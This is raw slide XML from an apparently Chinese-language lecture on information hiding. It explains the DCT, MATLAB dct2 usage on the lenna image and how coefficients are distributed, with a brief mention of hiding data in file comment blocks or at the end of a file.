            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean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6635023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62" y="3933056"/>
            <a:ext cx="56102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837041" y="5517232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lt"/>
              </a:rPr>
              <a:t>数值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>pq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>称为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>系数。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265838744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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1818923" y="184482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逆</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>变换定义如下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2492896"/>
            <a:ext cx="569247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73" y="3429000"/>
            <a:ext cx="325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475656" y="4034940"/>
            <a:ext cx="6840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设原始信号为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2× 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的矩阵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A, 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根据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>定义公式对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>其做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DCT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>变换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>得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19" y="4496605"/>
            <a:ext cx="10858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28593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文件格式信息隐藏</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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9461" name="Picture 4" descr="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35433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2971800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隶书" pitchFamily="49" charset="-122"/>
                <a:ea typeface="隶书" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>1。秘密信息嵌入  文件注释块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隶书" pitchFamily="49" charset="-122"/>
                <a:ea typeface="隶书" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>2。秘密信息嵌入文件末尾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latin typeface="隶书" pitchFamily="49" charset="-122"/>
                <a:ea typeface="隶书" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>DataStash</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="隶书" pitchFamily="49" charset="-122"/>
                <a:ea typeface="隶书" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>等掩密软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19463" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="5257800"/>
            <a:ext cx="1447800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 11875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4" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3733800"/>
            <a:ext cx="1447800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 11875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930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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp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46" y="620688"/>
            <a:ext cx="58197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9" y="4716438"/>
            <a:ext cx="7999413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3877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700808"/>
            <a:ext cx="7056784" cy="4114800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DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MATLAB 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sz="2200" dirty="0"/>
              <a:t>第一种方法是使用函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>dct2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>该函数使用一个基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>FFT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>的快速算法来提高当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>输入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>较大的输入方阵时的计算速度。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>dct2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>函数的调用格式如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>      B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>= dct2( A, [ M N] ) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="pt-BR" sz="2200" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2200" dirty="0" smtClean="0"/>
              <a:t>      B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>= dct2( A, M, N)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>, A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>表示要变换的图像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>, M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>是可选参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>表示填充后的图像矩阵大小。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>变换后得到的图像矩阵。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328033885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700808"/>
            <a:ext cx="7056784" cy="4114800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DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MATLAB 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sz="2000" dirty="0"/>
              <a:t>下面以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>lenna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>图像为例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>说明各种</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>变换函数的使用方法以及变换得到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DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>系数的性质。先对图像整体做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>变换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>MATLAB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>中输入如下代码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&gt;&gt; RGB = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>imread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>( ′c: \ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>lenna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>. jpg′) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;&gt; RGB = double( RGB) /255 ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RGBr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = RGB( : , : , 1) ; % </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>提取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>层做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>DCT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>DCTmatrix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> = dct2( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RGBr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;&gt; subplot( 1, 2 , 1) , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>imshow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>( RGB) ; title( ′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>原始图像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>′)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;&gt; subplot( 1, 2 , 2) , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>imshow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>( log( abs( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>DCTmatrix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>) ) , [ ] ) , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>    	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>colormap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>( jet( 64) ) ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt;&gt; title( ′</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>图像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>系数的光谱表示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>′) ;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392735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700808"/>
            <a:ext cx="7056784" cy="4114800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DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MATLAB 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sz="2000" dirty="0"/>
              <a:t>由于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>dct2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是针对二维矩阵的处理函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>所以我们先将原始的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>RGB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>图像转换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>为二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>维图像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>并且由于结果太大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>只取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>层的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系数矩阵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>进行分析。图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>3. 8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>显示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>了变化的结果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>用光谱的形式给出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>直观地表明了低频和高频</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>系数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>分布规律。图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>3. 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>是具体的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>图像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系数矩阵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean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16" y="3717032"/>
            <a:ext cx="5412550" cy="305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38056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700808"/>
            <a:ext cx="7056784" cy="4114800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DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MATLAB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0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08" y="1488903"/>
            <a:ext cx="774223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8903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0013" y="1827213"/>
            <a:ext cx="6658371" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>观察</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>3. 9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可以明显地发现如下规律</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>大体上</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>沿左上到右下的方向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>绝对值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>是依次递减的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>。所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>也就是说一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>图像</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>低频系数分布在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
